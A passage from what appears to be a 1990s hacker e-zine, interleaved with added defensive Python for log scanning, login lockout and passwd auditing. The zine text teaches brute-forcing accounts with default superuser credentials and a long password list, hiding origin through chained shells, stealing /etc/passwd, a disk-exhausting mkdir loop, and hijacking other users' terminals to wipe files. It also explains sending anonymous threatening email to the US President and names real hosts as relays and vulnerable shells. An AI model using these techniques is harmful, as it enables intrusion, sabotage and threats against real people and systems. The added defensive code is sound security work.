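    '"GET /cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/shadow HTTP/1.0" 404 207',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        state = "ANSWERED" if f["answered"] else "rejected"
        print(f'{f["host"]} {state} {f["target"]}: {"; ".join(f["reasons"])}')
```

A finding with a 200 status is the case to treat as an incident, since the script ran and may have returned the file; a 404 only shows that someone probed for it.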
Now if the phf bug doesn't work I always ask around to see if anyone I know
has a shell account on that system I could use. A shell account is a user
account that allows access to filez and programs. But if you don't know
anyone with a shell account on the system it is time to brute hack.
Brute hacking is just guessing the password until you get in. Yes this can
be boring so crank up your music and turn on the tv. If you have a shell
account on another system log into as many accounts as you can before you
log into the system you want to hack to hide where you are coming from.
So it would look something like this:
your isp ----telnet to-> shell #1 ------->shell#2------>the comp you want to hack.
If you have a shell and don't know what to type to telnet to another computer,
all you have to type is telnet, then you will get the prompt
telnet> Type open and you will get the prompt to> then type the address
of the site you want to hack.
If phf doesn't work you'll most likely have to resort to Brute Force Hacking.
To brute hack you must have a lot of patience because it could take a
long time.
Brute Force Hacking Described by members of LOD
~~~~~~~~~~~~~~~~~~~
There will also be many occasions when the default passwords will not work
on an account. At this point, you can either go onto the next system on your
list, or you can try to 'brute-force' your way in by trying a large database
of passwords on that one account. Be careful, though! This works fine on
systems that don't keep track of invalid logins, but on a system like a VMS,
someone is going to have a heart attack if they come back and see '600 Bad
Login Attempts Since Last Session' on their account. There are also some
operating systems that disconnect after 'x' number of invalid login attempts
and refuse to allow any more attempts for one hour, or ten minutes, or
sometimes until the next day.
The following list is taken from my own password database plus the
database of passwords that was used in the Internet UNIX Worm that was running
around in November of 1988. For a shorter group, try first names, computer
terms, and obvious things like 'secret', 'password', 'open', and the name
of the account. Also try the name of the company that owns the computer
system (if known), the company initials, and things relating to the products
the company makes or deals with.
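The two defences the passage above complains about, counting invalid logins and refusing further attempts for a period after 'x' failures, fit in one small state machine. This is an added example, not part of the original zine; the class name, the threshold of 5 and the ten-minute lock are assumptions, and the event list is constructed.

```python
from collections import defaultdict


class LoginGuard:
    """Count failed logins per account, lock after a threshold, report on next login."""

    def __init__(self, max_failures=5, lock_seconds=600):
        self.max_failures = max_failures      # the 'x' invalid attempts
        self.lock_seconds = lock_seconds      # ten minutes, as in the passage
        self.streak = defaultdict(int)        # consecutive failures per account
        self.since_last = defaultdict(int)    # failures since the last good session
        self.locked_until = {}                # account -> time the lock expires

    def attempt(self, account, password_ok, now):
        """Process one attempt at time `now` (seconds); return (decision, banner)."""
        if self.locked_until.get(account, 0) > now:
            # Refuse without evaluating the password: a correct guess made
            # during the lock must not be distinguishable from a wrong one.
            self.since_last[account] += 1
            return "refused", None
        if not password_ok:
            self.streak[account] += 1
            self.since_last[account] += 1
            if self.streak[account] >= self.max_failures:
                self.locked_until[account] = now + self.lock_seconds
                self.streak[account] = 0
                return "locked", None
            return "denied", None
        bad = self.since_last.pop(account, 0)
        self.streak[account] = 0
        banner = f"{bad} Bad Login Attempts Since Last Session" if bad else None
        return "ok", banner


def replay(events, guard):
    """Feed (time, account, password_ok) tuples through the guard."""
    return [guard.attempt(account, ok, now) for now, account, ok in events]


# Constructed sample: seven attempts on one account, then the owner logs in later.
SAMPLE_EVENTS = (
    [(t, "guest", False) for t in range(1, 7)]   # six wrong guesses, one per second
    + [(7, "guest", True)]                       # correct guess while locked out
    + [(700, "guest", True)]                     # owner logs in after the lock expired
)

if __name__ == "__main__":
    for (now, account, _ok), (decision, banner) in zip(
        SAMPLE_EVENTS, replay(SAMPLE_EVENTS, LoginGuard())
    ):
        print(now, account, decision, banner or "")
```

A lock keyed only on the account name lets anyone lock the real owner out on purpose; keying on account plus source, or adding increasing delays instead of a hard lock, are common alternatives.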
Anyway here are some common passwords to use when brute hacking:
These are super user accounts.
Login: Password:
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo
Or if it is a users account guess these passwords:
The password list was taken from A Novice's Guide To Hacking, by The Legion Of
Doom, and from some of my own discoveries. Here is the list of commonly used passwords:
Password:
aaa
academia
ada
adrian
aerobics
airplane
albany
albatross
albert
alex
alexander
algebra
alias
alisa
alpha
alphabet
ama
amy
analog
anchor
andy
andrea
animal
answer
anything
arrow
arthur
ass
asshole
athena
atmosphere
bacchus
badass
bailey
banana
bandit
banks
bass
batman
beautiful
beauty
beaver
daniel
danny
dave
deb
debbie
deborah
december
desire
desperate
develop
diet
digital
discovery
disney
dog
drought
duncan
easy
eatme
edges
edwin
egghead
eileen
einstein
elephant
elizabeth
ellen
emerald
engine
engineer
enterprise
enzyme
euclid
evelyn
extension
fairway
felicia
fender
finite
format
god
hello
idiot
jester
john
johnny
joseph
joshua
judith
juggle
julia
kathleen
kermit
kernel
knight
lambda
larry
lazarus
lee
leroy
lewis
light
lisa
louis
love
lynne
mac
macintosh
mack
maggot
magic
malcolm
mark
markus
martin
marty
marvin
matt
master
maurice
maximum
merlin
mets
michael
michelle
mike
minimum
nicki
nicole
rascal
really
rebecca
remote
rick
reagan
robot
robotics
rolex
ronald
rose
rosebud
rosemary
roses
ruben
rules
ruth
sal
saxon
scheme
scott
secret
sensor
serenity
sex
shark
sharon
shit
shiva
shuttle
simon
simple
singer
single
singing
smile
smooch
smother
snatch
snoopy
soap
socrates
spit
spring
subway
success
summer
super
support
surfer
suzanne
tangerine
tape
target
taylor
telephone
temptation
tiger
tigger
toggle
tomato
toyota
trivial
unhappy
unicorn
unknown
urchin
utility
vicki
virgin
virginia
warren
water
weenie
whatnot
whitney
will
william
winston
willie
wizard
wonbat
yosemite
zap
Once you have gotten in you need to get the passwd file. Type
etc/passwd
or
cat /etc/passwd
or
ypcat passwd
Depending on what system you are in.
Once you get the passwd file this is what it looks like and means.
john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
Broken down, this is what the above password file states:
Username: john
Encrypted Password: 234abc56
User Number: 9999
Group Number: 13
Other Information: John Johnson
Home Directory: /home/dir/john
Shell: /bin/john
But if you get a passwd file that is shadowed you will see
john:*:9999:13:John Johnson:/home/dir/john:/bin/john
If you get this, copying the passwd file won't help. The unshadowed passwd
file is usually /etc/shadow but you probably don't have permission to get it
unless you have a super user account.
If it is shadowed and you still want to pursue a superuser account try running
some source code which you can find at www.elkhart.net/~sborosh/hacking/filez/filez.html
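For an administrator, the field breakdown above is also an audit checklist: a hash in the second field is readable by every local account, an empty second field means no password at all, and the third field shows who else has UID 0. The auditor below is an added example, not part of the original zine; the function names are hypothetical, and the sample file is constructed (the john line is the one from the text, the other accounts are invented).

```python
from collections import namedtuple

Entry = namedtuple("Entry", "user password uid gid gecos home shell")


def parse_passwd(text):
    """Parse passwd-style text into Entry tuples (seven colon-separated fields)."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith(("#", "+", "-")):
            continue  # blank lines, comments, NIS compat entries
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        user, password, uid, gid, gecos, home, shell = fields
        entries.append(Entry(user, password, int(uid), int(gid), gecos, home, shell))
    return entries


def is_placeholder(password):
    """True when field 2 is a token meaning 'the hash is stored elsewhere'."""
    return password == "x" or password.startswith(("*", "!", "#"))


def audit(entries):
    """Return (user, finding) pairs for entries that weaken the system."""
    findings = []
    for e in entries:
        if e.password == "":
            findings.append((e.user, "empty password field"))
        elif not is_placeholder(e.password):
            findings.append((e.user, "password hash readable by every local user"))
        if e.uid == 0 and e.user != "root":
            findings.append((e.user, "UID 0 on an account other than root"))
    return findings


# Constructed sample file.
SAMPLE_PASSWD = """\
root:x:0:1:Super-User:/:/bin/sh
john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
jane:*:9998:13:Jane Johnson:/home/dir/jane:/bin/sh
guest::500:20:Guest:/home/guest:/bin/sh
sysman:x:0:1:System Manager:/usr/sysman:/bin/sh
"""

if __name__ == "__main__":
    for user, finding in audit(parse_passwd(SAMPLE_PASSWD)):
        print(f"{user}: {finding}")
```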
************************************************************************************************************
S E C T I O N 6
Navigating Unix
In this section I am going to give you some useful commands for navigating and using unix.
First off there is the who command which tells you who is on the system you are in.
Here is how to use the who command:
who -b Displays time sys was last booted.
who -H Precedes output with header.
who -l Lists lines waiting for users to logon.
who -q Displays number of users logged on.
who -t Displays time sys clock was last changed.
who -T Displays the state field (a + indicates it is possible to send to terminal, a - means you cannot)
who -u Gives a complete listing of those logged on.
who -HTu is the best choice
talk <username> allows you to chat with another user
write <username> writes e-mail to that user.
ls lists files in your current directory
du -a Checks the amount of memory you have, or disk space
cd name (name is the name of the sub-directory you choose)
cd (brings your home directory to current use)
help brings up some commands you can use
man <command> gives you all options on using that command
This next command will create havoc on a system
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device.
-----------------------------------------------------------------------------
This next section was provided by CarbonBoy
When a user's state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can do anything to these files, so long as you
have access - e.g. you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go straight to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT - if you can start cating to that terminal before the
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another user's
terminal, simply by 'cating' a string to a user's screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy (sometimes a
user will walk away without realizing that they are still
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it!
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using this technique you can wipe people's directories or
anything. (My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
End of Section by CarbonBoy
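Whether a terminal is open to this depends entirely on the write bits of its device file, which is what "mesg n" clears. The check below is an added example, not part of the original zine or of CarbonBoy's section; the function names and the /dev/pts default are assumptions, and it only reads permission bits.

```python
import os
import stat


def classify(mode):
    """Map a terminal's permission bits to who may write to that screen."""
    if mode & stat.S_IWOTH:
        return "world-writable"      # any local user can put bytes on the screen
    if mode & stat.S_IWGRP:
        return "group-writable"      # writable by the device's group
    return "owner-only"              # what "mesg n" leaves behind


def audit_terminals(dev_dir="/dev/pts", char_devices_only=True):
    """Return (path, owner_uid, octal_mode, classification) per terminal."""
    report = []
    for entry in sorted(os.scandir(dev_dir), key=lambda e: e.name):
        if entry.name == "ptmx":
            continue  # the pty multiplexer, not a user's terminal
        st = os.stat(entry.path)
        if char_devices_only and not stat.S_ISCHR(st.st_mode):
            continue
        perms = stat.S_IMODE(st.st_mode)
        report.append((entry.path, st.st_uid, oct(perms), classify(perms)))
    return report


def exposed(report):
    """Terminals that any account other than the owner can write to directly."""
    return [path for path, _uid, _mode, kind in report if kind == "world-writable"]


if __name__ == "__main__":
    for path, uid, mode, kind in audit_terminals():
        print(f"{path} uid={uid} mode={mode} {kind}")
```

Pass char_devices_only=False to run the same classification over ordinary files in a scratch directory when testing.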
--------------------------------------------------------------------------
I hope this little file is some help to you beginners. It's always nice
to see new handles on irc and to have people ask questions.
Keep on hackin and don't get caught!!
/////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\
| By DEFIANT |
/////////////////////////*************\\\\\\\\\\\\\\\\\\\\\\\\
~~~~Added By Defiant~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Mesin with da president!:
^^^^^^^NOTE FROM THA EDITOR^^^^^^^
This is a pretty touchy subject which could get you caught fast... we do not
support or recommend using the contents of this file, nor any other files in
this zine... Please Keep That In Mind As You Read This Text.
"NEET TRICKS TO PLAY ON BILL CLINTON"
By: CooL_MoDe (That's mode, not moe "D" you fuckers)
Ok Children. All you anti-political assholes out there should really enjoy this one.
How many of you have ever wondered, "Gee, wouldn't it be fun to do something to the President?"
Well, now you can. I am writing a 3 part article on different things you can do to old BC. Each one has something to do with the H/P/V/A/C world.
Part 1: E-Mail Threats!!!!!
In this little article I will teach you how to send threatening emails to the President, AND GET AWAY WITH IT!!! In order to do this you MUST know something about sending anonymous email. What you will need:
an anonymous email server
3 shell accounts with any telnetable UNIX system.
the presidents email
(All of these are provided)
Ok, now here we go. In order to save your ass from getting caught you MUST telnet to at least three other sites before telneting to the email server of your choice (preferably one using an older version of sendmail). So first of all, get out the old telnet client and telnet to wherever you have an account (make sure it is not your account, or you are gonna get busted). Once you connect to the account login, and from there telnet out again to another different account:
ie: telnet myshell.whatever.org
From there do the same thing, telnet out again to the third, and final account.
Once in the third account you must connect to the email server you are going to use to send this mail from. Below is a list (note some of these may have upgraded, and are no longer anonymous, but you should still be pretty safe as long as you telnet to those sites first):
www.zombie.com
mail.sgi.net
mail.westol.com
mail.vcalpha.com
(Note: when connecting to a mail server you MUST connect to port 25)
Ok, now, you are in the third account type:
telnet my.mail.server 25
You will see something like:
220 bla.bla.bla ESMTP Sendmail 8.8.5/8.8.5; Thu, 27 Feb 1997 16:05:39 -0500 (EST)
You must type
HELO me.com (or wherever you want the mail to be coming from)
MAIL FROM: wherever@me.com (or the full email address of wherever you want to be sending from)
RCPT TO: President@whitehouse.com
DATA
Whatever you wish to write
. (Put the . on a line by itself to stop the message)
Note: you can send multiple messages, simply by starting the process over again after the . with another MAIL FROM: command. To quit, simply type quit.
PLACE TO GET UNIX SHELLS:
www.csmc.edu
www.dardan.com
www.fxmedi.com
All of the above sites have the phf exploit and the password file can be EASILY acquired.
DON'T GET CAUGHT!
C_M
~~~~Added By Cool_Mode~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Tips From Sygma:
Welcome to The First Issue of The Krack EZine. I, Sygma, will be showing
you some cool tricks and hacking. I would also like to say (So I don't get
in Shit), that all the information presented on this page is for
educational purposes ONLY... but we all know that's not what you're going to
be using it for. Anyways I will be covering in every Issue, IRC
Scripting, Unix, and 95 (Yes 95.. Some Tricks and shit for dummies, cause
some people need it, no Names to be said). If you need back issues and so
on, check www.on-it.net/~sygma/Krack (Which is not up yet cause I need to
make it :)) In all issues there is going to be a little area about stuff
that I write on, my views and so on.
First, my views :). I was reading TIME (Feb 3rd, 1997) and got to
page 53 or so. The article is called INFO PIPELINES. I was looking at the
double page map and looked at the legend. Now would someone explain to me
why we run Coaxial Cables to South America, and some 2.5 Gigabits a sec
lines (Coaxial what were they thinking?). On the Right hand side I was
reading that in Europe/Asia a "SEA-ME-WE 3, operational around 1999,
initially 10 gigabits per sec." Hint: Look at the word SEA then you'll
find out where it runs. Here is a Quote from TIME:
"I'll put a girdle 'round about the earth in 40 minutes,"
declared Puck in A Midsummer Night's Dream. Four hundred years after the
play was first produced, the globe is being girdled more thoroughly than
Shakespeare ever dreamed. The transoceanic copper wires that made
communications possible in the presatellite era are being replaced by
arrays of sophisticated fibre optic capable of carrying huge amounts of
data more reliably than the electronic birds circling in the upper
atmosphere. These new data links are the oil pipelines of the information
age, the prime conduits for the technological revolution. Where and how
they are built points the way to future change.
The FLAG (FibreOptic Link Around the Globe) project, a $1.5
Billion, 28 000 KM underwater cable snaking its way across the ocean floor
from Britain to Japan, is nearly complete. When finished, it will offer
uninterrupted data traffic between Europe and Asia, traffic that currently
must be routed through the U.S. It is akin to opening a new navigational
route that will link 75% of the World's Population. Its 5 gigabits of
information per second will allow for a huge increase in electronic
traffic.
Another megaproject that will alter informational trade routes is
the $1.73 Billion SEA-ME-WE 3 cable, approved in January by the 70
countries involved in its construction. Stretching 38 000 KM, it will by
1999 connect SouthEast Asia, Western Europe...."
This Article goes on for quite awhile, but this is the part that
interests me. We get all this lag on irc and all, since not all the
servers run the same line. Dallas for instance is the fastest irc server,
connection wise. Followed by Washington and Vancouver if I can remember
well. Only if all the servers would be running the same speed connection
we would not have as many problems. Think About it.
Now onto the Irc Scripting section. I'm going to start this off
REALLY easy. Like this is so easy you would think that a newborn kid
could do it.
-= Alias =- I have added some Easy to Use aliases.
/i+ /mode # +i
/i- /mode # -i
/n+ /mode # +n
/n- /mode # -n
/m+ /mode # +m
/m- /mode # -m
/t+ /mode # +t
/t- /mode # -t
/s- /mode # -s
/s+ /mode # +s
/p+ /mode # +p
/p- /mode # -p
/k+ /mode # +k $$1
/k- /mode # -k $$1
/v+ /mode # +v $$*
/v- /mode # -v $$*
/l+ /mode # +l $$1
/l- /mode # -l
-= Events =- I will be using a 10 level system.
10. Protect, Ops, and so on... the rest of the levels I'll think
of.. 1 is shitlist tho :) 8 will be just ops.
10:ON JOIN:#:/mode $chan +o $nick
8:ON JOIN:#:/mode $chan +o $nick
ok now see how easy I started? (I'm actually crying now, this is
sooooooo funny) anyways.
-= Popups =-
under Nicknames List add this
User Levels:
.Friend
..Add:/guser 8 $* 3
..Remove:/ruser 1 $*
.Friend (level 10)
..Add:/guser 10 $* 3
..Remove:/ruser 1 $*
.Add User:/auser =6 $*
Ok enough of that Section.. hehehe Ok now for the Unix Section.
This is going to start off from beginner to expert. We get those people
joining #Hackteach asking for help and some how end up getting banned.
AHEM I won't mention nicks. This first one will be basic unix commands
and stuff. Why? Because I'm running out of time to do more. Was on a
ski trip last week.
-=PLEASE NOTE, what I put in CAPS MUST BE in Caps, case sensitive =-
ls - This is the Unix command for 'dir'
mv - move
cp - copy
mkdir - make a directory
ps - check processes
w - show users
finger - uhhh.. better let urself figure this out.
Ok I'm like outta time..cause it's about 9:
pm right now.. and I need to finish 3 essays for tomorrow.. if u have any
questions or comments, please Email me: Sygma@Pegasus.on-it.net. Also I
don't want to get some bullshit mail.
~~~~Added By Sygma~~~~
---------------------------------------------------------------------------

---------------------------------------------------------------------------
List of members:
Members with a > next to their name donated to this issue... All other
members who dont have that are either on probation... or have a special
arrangement with me.
>DocKool Leader/Programmer/ DocKool@hotmail.com
>NeTDeViL Leader/HTML Editor/Phreak NeTD@hotmail.com
KaMeLeoN Leader/Founder/Grafix Expert Liongrafx@hotmail.com
>Sygma Writer/Scripter Sygma@pegasus.on-it.net
>BlueRain Writer/Programmer pmurgs@aztec.co.za
KidLinux Writer/Programmer infs00ca@frank.mtsu.edu
OoPTiCoO Writer/ ay921@rfgn.epcc.edu
Cyb3rCh|k Writer/ cyb3rchik@worldnet.att.com
DeathLike Writer/ Deathlike@hotmail.com
>Defiant Writer/ Sborosh@skyenet.net
>Dislexic Writer/WebDesign/Security jhanna29@ally.ios.com
>Od^Phreak Writer/Unix Haxor butler@tir.com
Zophar Writer/Phreak zophar@ix.netcom.com
>Cool_Mode Writer/Unix Hacker coolmode@sgi.net
---------------------------------------------------------------------------

---------------------------------------------------------------------------
Closing notes:
Wassup Wassup Wassup, This is NetDevil your Zine Editor. I been away awhile
but we're back, and Doc, Kame, and I are bringing Krack back strong. But we
need yer help... if you have anything we can use, from the newest bugs in
popular software to well... anything we can use... please email it to me. A
special thanx go out to all the members... especially those who donated...
it was through your hard work and efforts that the rising of Krack was able
to put this out... thanx again to everyone.
NeTDeViL
P.S. I threw in some helpful links below... chek em out.
www.microsoft.com --- Microsofts home page... includes dnloadable soft.
www.netscape.com --- Netscapes home page... does this software work???
www.yahoo.com --- search engine
www.lycos.com --- search engine
www.webcrawler.com --- search engine
www.altavista.com --- search engine
www.hotmail.com --- free web based email
www.netmanage.co.jp/news/jetmail.htm --- free web based email
www.geocities.com --- free web space for web pages
www.angelfire.com --- free web space for web pages
www.mirc.co.uk --- mIRCs downloadble software
www.tucows.com --- free utilities
---------------------------------------------------------------------------

---------------------------------------------------------------------------
This Has Been a K.R.A.C.K. production. Thank you for Choosing K.R.A.C.K
Killer Ride And Chillin Kraftwork
Also With
10010011 1000110 10010001 10101001 10101001
CyBrids CSE The Taste of a new Genre ;)
10101001 1010101 11010010 10101010 10101010
Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz! Cybrids Roxen Jue Azz!